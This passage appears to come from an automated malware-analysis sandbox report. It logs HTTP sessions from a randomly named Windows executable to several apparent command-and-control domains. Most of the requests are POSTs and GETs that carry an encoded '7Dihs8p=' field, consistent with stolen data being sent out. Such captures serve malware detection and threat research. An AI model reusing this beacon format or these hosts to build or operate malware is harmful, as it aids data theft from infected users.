                                                    3 | 192.168.2.6 | 49729 | 208.91.197.13 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:23.692491055 CEST | 1668 | OUT | POST /92z0/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.mengistiebethlehem.com
                                                    Origin: http://www.mengistiebethlehem.com
                                                    Referer: http://www.mengistiebethlehem.com/92z0/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.6 | 49730 | 208.91.197.13 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:26.223670006 CEST | 354 | OUT | GET /92z0/?7Dihs8p=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.mengistiebethlehem.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:51:27.306071043 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 15:51:17 GMT
                                                    Server: Apache
                                                    Set-Cookie: vsid=926vr46756747717851324; expires=Mon, 02-Jul-2029 15:51:17 GMT; Max-Age=157680000; path=/; domain=www.mengistiebethlehem.com; HttpOnly
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_gSiSyc+dGJYp8FyLVxDu1ZyEcW8c+AALhPBFIKdLEsN3TZEjwZpvx2hbaOkMZE6Pig+SKrSXfSI2gPtBFhg4Pg==
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.6 | 49732 | 188.114.96.3 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:32.454891920 CEST | 589 | OUT | POST /oc7s/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.ad14.fun
                                                    Origin: http://www.ad14.fun
                                                    Referer: http://www.ad14.fun/oc7s/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:51:33.242646933 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 15:51:33 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vca%2FlMvIwrY5lzAcIcAz7kimKxZx8iNN5RZ34hjjDl7y2CoZTGsCkBkcGE5kE9KFg4oJk4lFgNlYzOHJ919CR4x55bfm0jYYDXcqY22N0XZkdjFMvAI%2BmKimsZPHXKg%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d8099e69608c8d-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.6 | 49733 | 188.114.96.3 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:34.995667934 CEST | 613 | OUT | POST /oc7s/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.ad14.fun
                                                    Origin: http://www.ad14.fun
                                                    Referer: http://www.ad14.fun/oc7s/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:51:35.760761976 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 15:51:35 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMYvKF18P9QL1yUsMPyuhCbLPkUshg1rZaBX6Ilnw%2Bo7bIAVtQYGxV8tEOi%2BBY%2FaIoAHhYBsn6nMpSBHwMBm7cf4ayFGpSuR7Mc51KfQEjWaXN0erDTMcdgawdOlfLU%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d809ae9af96a5e-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.6 | 49734 | 188.114.96.3 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:37.834734917 CEST | 1626 | OUT | POST /oc7s/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.ad14.fun
                                                    Origin: http://www.ad14.fun
                                                    Referer: http://www.ad14.fun/oc7s/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:51:38.469121933 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 15:51:38 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7RY00rPIFTNQQ79gcyCPtGBp%2FbsiMI2M8VSMwZGd%2FqUL7ztayMmjhfEThWjr38FmnY4%2BEd0TAP4V9hPWQJOGjx6k0iTQTJrVWojy%2Fs3W6lVBuR7VEAzPVXnjLv7iXyY%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d809bffc810f53-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.6 | 49735 | 188.114.96.3 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:40.364011049 CEST | 340 | OUT | GET /oc7s/?Bp=2LpD8tLh&7Dihs8p=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.ad14.fun
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:51:41.055814981 CEST | 753 | IN | HTTP/1.1 302 Moved Temporarily
                                                    Date: Wed, 03 Jul 2024 15:51:40 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Location: http://yg08.gowi0i.xyz
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dWnaLNhdp1cX2excPqk8GyFBHtl%2FCi4nRzu6xutVe4RaPnShOqOGWV4fhO87DwzFMQpTJXZ3Ay1CTTIARlwCwD2nzHnzX%2F1PAXVcVBc%2BLp1GfyP3B8u06Rm0iApbcws%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d809cfdfba178c-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Ascii: 8a<html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    9 | 192.168.2.6 | 49737 | 192.185.208.8 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:46.558480024 CEST | 616 | OUT | POST /2769/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.epicbazaarhub.com
                                                    Origin: http://www.epicbazaarhub.com
                                                    Referer: http://www.epicbazaarhub.com/2769/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=mSVsSfagqWQureFWJ3MCfkZ7H5wWtE3823QzYT/2BqwKOHCbjVrAfsQ2pYHOGWI+wVFOljFPqFyYN8NbV3a5QRz67Mh9Kpznwc5+OhoEWzADR82RK3ooSCJ52T+yoiioLmP/kAW4G8Of6brjlBoZXWzgc751OFPTuoh1m6twney4UvNInUcZlqzmoqwnxnKdAszuq64AX0yC
                                                    Jul 3, 2024 17:51:47.246383905 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:51:46 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Content-Length: 14879
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    10 | 192.168.2.6 | 49738 | 192.185.208.8 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:49.132194042 CEST | 640 | OUT | POST /2769/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.epicbazaarhub.com
                                                    Origin: http://www.epicbazaarhub.com
                                                    Referer: http://www.epicbazaarhub.com/2769/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=mSVsSfagqWQuq+VWOU0CI0Z8bpwWmk3423szYSqxGZYKNnybkkrAcsQ2i4HHFmIPwV5sljJPqFWYN89bVgO6RBz4g8hzEJznwc5+OhsuW1oDQMGRKWopMSJ2mj+yiCisLmPWkFOGG+Gf6fvjmQoYeWzmCL4RJASUjZw3kc1O3ubcVZMS7nc636TkoooVxHK3CsLu4t0nYAXhQtovORswMROa0wjfEa9kaw==
                                                    Jul 3, 2024 17:51:49.767226934 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:51:49 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Content-Length: 14879
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    11 | 192.168.2.6 | 49739 | 192.185.208.8 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:51.661206961 CEST | 1653 | OUT | POST /2769/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.epicbazaarhub.com
                                                    Origin: http://www.epicbazaarhub.com
                                                    Referer: http://www.epicbazaarhub.com/2769/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p= [TRUNCATED]
                                                    Jul 3, 2024 17:51:52.284810066 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:51:52 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Content-Length: 14879
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    12 | 192.168.2.6 | 49740 | 192.185.208.8 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:51:54.194305897 CEST | 349 | OUT | GET /2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.epicbazaarhub.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:51:54.928082943 CEST | 509 | IN | HTTP/1.1 301 Moved Permanently
                                                    Date: Wed, 03 Jul 2024 15:51:54 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Location: http://epicbazaarhub.com/2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Bp=2LpD8tLh
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    13 | 192.168.2.6 | 49741 | 121.254.178.230 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:00.572144032 CEST | 604 | OUT | POST /wvam/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.rz6grmvv.shop
                                                    Origin: http://www.rz6grmvv.shop
                                                    Referer: http://www.rz6grmvv.shop/wvam/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=krlYJUqdYS9K033UkIkLtofxpctdn4oAv2s1cvTK/8adwf97UmQ3gQBpazhYn2mAoktgjGTV9UcCK1ORaUA7DeB4fFkN79v06tGjEDTfyKNitp2VRsz6269C/bbbFCrsUJjcEkV8PaCaI6hgJjrkT3OEb0l1khJxBfzItOOHCXQkR3AnQEsy/ngjgsqomvAE8N3PVI2L8IP5
                                                    Jul 3, 2024 17:52:01.480489016 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:00 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.6 | 49742 | 121.254.178.230 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:03.100645065 CEST | 628 | OUT | POST /wvam/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.rz6grmvv.shop
                                                    Origin: http://www.rz6grmvv.shop
                                                    Referer: http://www.rz6grmvv.shop/wvam/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=krlYJUqdYS9K2UvUoLcLhYfwsctd14ocv2g1crLa/Oudw+N7TXQ31QBpRTgS4GmPokxGjE3V9UgCK3GRbjU8BOB6QlkL1dv06tGjEH75yJ9isaeVTJH5pK9d4bbbBCroUJjEEgUpPZ6aI7RgJwzjd3OGF0k1gVQvYeK0iMaxf3ckdhB9M3sRt3AhguyamPAu+NPPHf6sz8qadoDuEL/c7Z/gDn3Muun12w==
                                                    Jul 3, 2024 17:52:04.033926010 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:03 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.6 | 49743 | 121.254.178.230 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:05.932557106 CEST | 1641 | OUT | POST /wvam/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.rz6grmvv.shop
                                                    Origin: http://www.rz6grmvv.shop
                                                    Referer: http://www.rz6grmvv.shop/wvam/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p= [TRUNCATED]
                                                    Jul 3, 2024 17:52:06.848774910 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:06 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    16 | 192.168.2.6 | 49744 | 121.254.178.230 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:08.490236044 CEST | 345 | OUT | GET /wvam/?Bp=2LpD8tLh&7Dihs8p=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.rz6grmvv.shop
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:09.381258011 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:08 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wvam/ was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    17 | 192.168.2.6 | 49746 | 203.161.49.220 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:14.545154095 CEST | 604 | OUT | POST /oui5/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hellokong.xyz
                                                    Origin: http://www.hellokong.xyz
                                                    Referer: http://www.hellokong.xyz/oui5/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=fDzsK/XJya2uRc5MnmcmtQ8Fcdnz2OubmyW515BwoeAQli8AMat19OgMvrM87SKbeUdnEPNs+YRA2NeSpCRWUXUABSikKZSDT55+LCi5Lwmu6EkILOzWmyN8irZSsoPvUxIam3aPBzujUXkUcq7r1B+xTamynV8sHjqmjjlFHIT6oQKxpYrANMWsthCxV5CQxvKLE0Jp3zR1
                                                    Jul 3, 2024 17:52:15.130449057 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:15 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    18 | 192.168.2.6 | 49747 | 203.161.49.220 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:17.118135929 CEST | 628 | OUT | POST /oui5/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hellokong.xyz
                                                    Origin: http://www.hellokong.xyz
                                                    Referer: http://www.hellokong.xyz/oui5/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=fDzsK/XJya2uQ8JMgGgmlQ93ANnz9uuXmyK514FaoqsQiAkAePR18OgMlLMl/SKqeURFEOxs+e9A2PGSpUZVWHUCOyimH5SDT55+LDTkLzWu73MIZrPRoSN/07ZSooPrUxJPm1+pB2ijUWUUd/Ho/B/4Oqnb0QZbey7881wofJaQtmLr1rrjfc2utjaDVZC6zvyLWjFO4H0WSDEAprycsuRbsGg3R4jiag==
                                                    Jul 3, 2024 17:52:17.701555967 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:17 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    19 | 192.168.2.6 | 49748 | 203.161.49.220 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:19.888699055 CEST | 1641 | OUT | POST /oui5/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
